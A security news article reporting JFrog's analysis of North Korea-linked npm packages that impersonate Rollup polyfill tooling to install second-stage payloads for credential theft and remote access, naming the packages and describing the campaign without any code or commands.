North Korea-Linked npm Packages Mimic Rollup Polyfills to Steal Developer Secrets

North Korea-Linked npm Packages Mimic Rollup Polyfills to Steal Developer Secrets

North Korea-Linked npm Packages Mimic Rollup Polyfills to Steal Developer Secrets

https://thehackernews.com/2026/07/north-korea-linked-npm-packages-mimic.html

Publish Date: 2026-07-03 12:07:00

Source Domain: thehackernews.com

Threat actors with ties to North Korea have been linked to a fresh set of malicious npm packages that masquerade as Rollup polyfill tooling to facilitate remote access and data theft.

According to JFrog, the packages “rollup-packages-polyfill-core” and “rollup-runtime-polyfill-core” mimic the legitimate “rollup-plugin-polyfill-node” project, down to the description, repository metadata, and package shape.

“The lookalike packages place themselves in the same rollup, polyfill, core, and node naming space, which can look plausible during a quick dependency review,” JFrog said in a technical write-up of the campaign.

The campaign also involves four other packages, all of which have since been removed from the npm registry –

  • quirky-token
  • react-icon-svgs
  • rollup-plugin-polyfill-connect
  • swift-parse-stream

What’s noteworthy here is that “rollup-packages-polyfill-core” installs and loads “swift-parse-stream,” while “rollup-runtime-polyfill-core” installs and “quirky-token.” In a similar fashion, “react-icon-svgs” has been found to install “rollup-plugin-polyfill-connect” as a second stage.

“The second-stage packages are near-identical SVG utilities that fetch a JSON object from JSONKeeper and eval the model field,” the cybersecurity company said. “This layered structure, together with the lookalike names, legitimate-looking metadata, hidden install-time execution, environment checks, and credential-theft/remote-access payloads, is similar to previous North Korean Lazarus-linked npm campaigns.”

It’s worth emphasizing here that this is not the first time North Korean threat actors have uploaded npm packages impersonating Rollup polyfill tools. In April 2026, Panther detailed a sustained npm campaign that involved publishing 108 malicious npm packages spanning 261 versions to deliver BeaverTail and OtterCookie, two known malware families linked to Contagious Interview. Among those packages was “rollup-plugin-polyfill-route,” which was published on March 20,…

Source